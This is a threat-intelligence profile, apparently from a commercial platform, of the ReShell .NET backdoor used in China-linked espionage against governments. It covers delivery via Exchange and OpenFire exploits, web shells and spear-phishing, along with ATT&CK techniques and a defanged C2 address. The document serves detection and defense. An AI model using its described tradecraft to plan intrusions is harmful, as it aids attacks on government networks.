ReShell
ReShell is a previously undocumented .NET backdoor used in China-linked cyber espionage operations. It was first identified by Palo Alto Networks Unit 42 in intrusion cluster CL-STA-0045, which Unit 42 attributed with moderate confidence to Alloy Taurus (aka GALLIUM/Softcell), and it has also been reported by Trend Micro as malware used by the China-nexus actor Earth Krahang. Trend Micro described Earth Krahang as targeting government entities worldwide since early 2022, with a strong focus on Southeast Asia and additional victims in Europe, the Americas, and Africa.
Observed delivery and access paths include exploitation of Microsoft Exchange Server vulnerabilities, deployment via web shells on compromised servers, and spear-phishing. In the CL-STA-0045 activity, attackers attempted to execute ReShell as an undocumented .NET backdoor named windows.exe; Unit 42 named it based on its PDB path. In Earth Krahang operations, ReShell was delivered during the initial stage of attacks alongside Cobalt Strike and XDealer.
High-confidence capabilities directly described in the source material include information collection, file dropping, command execution, and AES-encrypted command-and-control communications. Unit 42 also reported that a ReShell sample was configured to communicate with 23.106.122[.]46 for command execution. Trend Micro further stated that ReShell is packed with ConfuserEX.
ReShell has been observed in long-term espionage intrusions against government-related targets, including a Southeast Asian government environment involving critical infrastructure, public healthcare institutions, public financial administrators, and ministries. In broader Earth Krahang reporting, the malware was associated with campaigns against government ministries and especially foreign affairs organizations. Related tooling observed in the same operations included China Chopper web shells, Cobalt Strike, Quasar RAT, GhostCringe, SoftEther VPN, Kerbrute, Mimikatz, ProcDump, Fscan, PlugX, ShadowPad, and XDealer/DinodasRAT.
Notable indicators and artifacts directly mentioned in the content include the filename windows.exe and C2 IP 23.106.122[.]46.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Earth Krahang delivers backdoors to establish access to victim machines. Cobalt Strike and two custom backdoors, RESHELL and XDealer, were employed during the initial stage of attack.
Earth Krahang delivers backdoors to establish access to victim machines. Cobalt Strike and two custom backdoors, RESHELL and XDealer, were employed during the initial stage of attack.
Techniques & procedures
13 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
4 techniquesEarth Krahang abuses the trust between governments to conduct their attacks. We found that the group frequently uses compromised government webservers to host their backdoors and send download links to other government entities via spear phishing emails.
Earth Krahang delivers backdoors to establish access to victim machines. Cobalt Strike and two custom backdoors, RESHELL and XDealer, were employed during the initial stage of attack.
the group frequently uses compromised government webservers to host their backdoors and send download links to other government entities via spear phishing emails.
Since the malicious link uses a legitimate government domain of the compromised server, it will appear less suspicious to targets and may even bypass some domain blacklists.
Initial Access
3 techniquesThe threat actor abused the following vulnerabilities multiple times: CVE-2023-32315: command execution on OpenFire; CVE-2022-21587: command execution on Oracle Web Applications Desktop Integrator.
Earth Krahang also makes use of spear phishing email to attack its targets... In one case, the actor used a compromised mailbox from a government entity to send a malicious attachment to 796 email addresses.
the group frequently uses compromised government webservers to host their backdoors and send download links to other government entities via spear phishing emails.
Execution
2 techniquesthe emails are intended trick their targets into opening attachments or embedded URL links that ultimately lead to the execution of a prepared backdoor file on the victim’s machine.
Persistence
1 techniquePrivilege Escalation
1 techniqueStealth
1 techniquebackdoor filenames are usually related to geopolitical topics... 'Plan of Action (POA) - TH-VN - TH_Counterdraft_as of Feb 2022.doc.exe'
Command and Control
3 techniquesIts binaries are packed with ConfuserEX and its command-and-control (C&C) communication is encrypted with the AES algorithm.
uses certutil commands to download and install the SoftEther VPN server.
its command-and-control (C&C) communication is encrypted with the AES algorithm.
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A bespoke malware/backdoor used by Earth Krahang in espionage intrusions.
A simple .NET backdoor with capabilities to collect information, drop files, and execute system commands. Its binaries are packed with ConfuserEX and its C2 communication is encrypted with AES.
Previously unknown backdoor (per Unit 42) used for access/persistence in the described espionage cluster.
Previously undocumented .NET backdoor (windows.exe) configured with an embedded C2 IP to enable remote arbitrary command execution.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.